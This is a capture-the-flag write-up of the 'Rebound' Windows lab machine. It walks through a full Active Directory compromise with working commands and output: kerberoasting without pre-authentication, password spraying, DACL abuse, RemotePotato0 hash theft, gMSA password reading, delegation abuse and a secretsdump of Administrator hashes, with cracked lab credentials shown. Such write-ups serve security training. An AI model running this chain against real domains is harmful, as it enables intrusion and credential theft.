Rebound

A Windows Machine which comprises of a multitude of AD vulnerabilities.

Enumeration

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time: 
|   date: 2023-12-24T11:28:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds

Enumerating SMB and LDAP yielded me nothing. But i was able to connect to SMB unauthenticated without perms using rpcclient so i proceeded with enumerating potential users with rid cycling.

kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''    
SMB         10.10.11.231    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\Guest:
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...

I then tried AS-REP roasting hoping for some quick wins for initial access but could not crack the hash which probbaly meant this was not intended.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set

──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%

Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023

After a very long time, I then stumbled across this article, talking about kerberoasting without pre-authentication. Similar to AS-REP roasting, the exploit leverages two things which we all have.

• Having a user account with pre-authentication disabled (We have the user account jjones )

• Having one or multiple valid service account to target (We have a list of users in the domain)

To keep myself sane from all the impacket branch errors i was receiving, i decided to use a Windows VM and perform the exploit using Rubeus and the /nopreauth parameter.

PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones"  /spns:C:\Users\nicholas\Desktop\users.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.1


[*] Action: Kerberoasting

[*] Using jjones without pre-auth to request service tickets

[*] Target SPN             : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Target SPN             : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)

[*] Target SPN             : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31

We can now try to crack these hashes using hashcat and rockyou giving us the password of ldap_monitor.

PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 333 MB

Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19a                                                                                                           a1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2b                                                                                                           be8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee621                                                                                                           1aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534                                                                                                           499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27f                                                                                                           fac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3                                                                                                           325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211df                                                                                                           fb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df9                                                                                                           9423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8d                                                                                                           da59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e3                                                                                                           39071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c502                                                                                                           2d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499                                                                                                           997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dca                                                                                                           a15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a4                                                                                                           4cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1G                                                                                                           GR8t@$$4u

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16

Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024

Initial Foothold

After obtaining domain credentials, I then proceeded to map the domain using bloodhound and managed to see route for lateral movement to obtain user access but not with the users we have on hand.

A path to user maybe?

From the graph above, our main goal is either to

1. Obtain either PPAUL or FFLOCK user account OR

2. Enroll ourselves as a group member of SERVICEMGMT somehow

Obtain either PPAUL or FFLOCK user account

Using the existing password obtained from ldap_monitor's account, i performed password spraying using crackmapexec and managed to get a match on the user oorend .

┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/impacket-master]
└─$ crackmapexec smb rebound.htb -u ../users.lst -p '1GR8t@$$4u' --continue-on-success
SMB         dc01.rebound.htb 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         dc01.rebound.htb 445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE 

Sadly, the password spraying did not work on both PPAUL and FFLOCK.

Enroll ourselves as a group member of SERVICEMGMT somehow

I then remembered some ACLs permissions are not explicitly shown in bloodhound and must be explicitly enumerated using something like PowerView's FindDomainObjectAcl. However I kept recieving the error Server not operational.

I then struggled to find a Linux alternative till i finally stumbled across impacket's dacledit which essentially allows me to enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.

┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 ./dacledit.py -action read -target SERVICEMGMT -principal oorend -dc-ip 10.10.11.231 rebound.htb/'oorend':'1GR8t@$$4u' -use-ldaps  -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra


[-] CCache file is not found. Skipping...
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-7682)
[*]   ACE[2] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : Self (0x8)
[*]     Trustee (SID)             : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

Success!, we know that oorend has Self permission meaning that he has the ability to add himself to the SERVICEMGMT group.

We can easily do that using bloodyAD's AddGroupMember functionality.

─[sg-free-1]─[10.10.14.122]─[NicholasSoh@htb-x8h8zosurg]─[~/Desktop]
└──╼ [★]$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember SERVICEMGMT oorend
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB

Referencing the bloodhound graph earlier, SERVICEMGMT group has GenericAll privileges over the OU SERVICE USERS or Full Control.

Once again, we can use impacket's dacledit to grant us full control perms as oorend .

┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB'  rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!

As oorend, we have full control over the OU Service Users and subsequently winrm_svc.

We can now change the password of winrm_svc easily using rpcclient and subsequently ps-remote to get the user flag.

└─$ rpcclient -U  rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $> 

Privilege Escalation

Using query user, we see that the user tbrady is logged on.

PS C:\Users\winrm_svc>
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 tbrady                console             1  Active      none   25/11/2023 8:24 AM

For some reason, the same command no longer gives me this output as of 20/1/2024

PS C:\Users\winrm_svc\Documents> query user
No User exists for *

From here, we can utilize RemotePotato0 which allows us to get the ntlm hash of any user logged in on the target machine which in this case is tbrady.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999

PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client   : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash     : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000

Cracking with rockyou, we get the password 543BOMBOMBUNmanda .

Looking back at bloodhound, we see that user tbrady has ReadGMSAPassword over DELEGATOR$.

This means we can actually read DELEGATOR$'s hash via the msDS-ManagedPassword attribute.

──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/gMSADumper]
└─$  bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc
msDS-ManagedPassword.B64ENCODED: lYA9ZPQxWkDehiHAljsucRRnh5N0HqwjJlbAqxWzhzsH3SGikzaR6F+rMpbBQqpDZBkktx2va1e+xSr+6a1jZrAupT3pvoKoV+Uja9ag0U4iavTkEtZKylKCStup68owRI9pkKsXzn+Dcz8K6fs80d2AHPNE6EWaLMakVbu7l49PqYQ8bltyjO71cEoDH7UcnJbqNwoXksbsFwMWK/Q0pL3TLQ2Ems8Ex2ng+ao9fYEPd79THKR13LwkwowzOYXF3THskJPmfUcSnibo5uvqnZXcjLczpsJSixShdooHHgjrxOweFu8GAGSfdS/nNBou1mqcq2RFQ4sDA/bhFuqJ6Q==

The name of the account suggests exploiting something regarding delegations. To enumerate the delegation properties of the DELEGATOR$ account, we need to use PoweView's GetNetComputer and filter the properties.

PS C:\Users\winrm_svc\Documents> Get-NetComputer delegator | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
http/dc01.rebound.htb 

We see that $DELEGATOR has the msds-allowedtodelegateto property for the service http/dc01.rebound.htb.

However, from our bloodhound output, Administrator user cannot be delegated.

With reference to this, RBCD (Resource-based Constrained Delegation) can be used to bypass this. To perform this attack, we need two things which we already have.

1. A account with SPN - ldap_monitor user fiits the requirement

2. An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object OR

   1. Our own machine account via DELEGATOR$ as machine accounts are allowed to edit their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute

Using impacket's RBCD, we can exploit this by appending value of ldap_monitor to msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd  'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)

We can now obtain a ticket via delegation operation.

┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Impersonating dc01$
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache

Once the ticket is obtained, it can be used in a S4U2proxy request, made by DELEGATOR$, on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.

──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating dc01$
[*] 	Using additional ticket dc01$.ccache instead of S4U2Self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache

Finally, we can get the Administrator hash via secretsdump.

──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump  -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator 
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...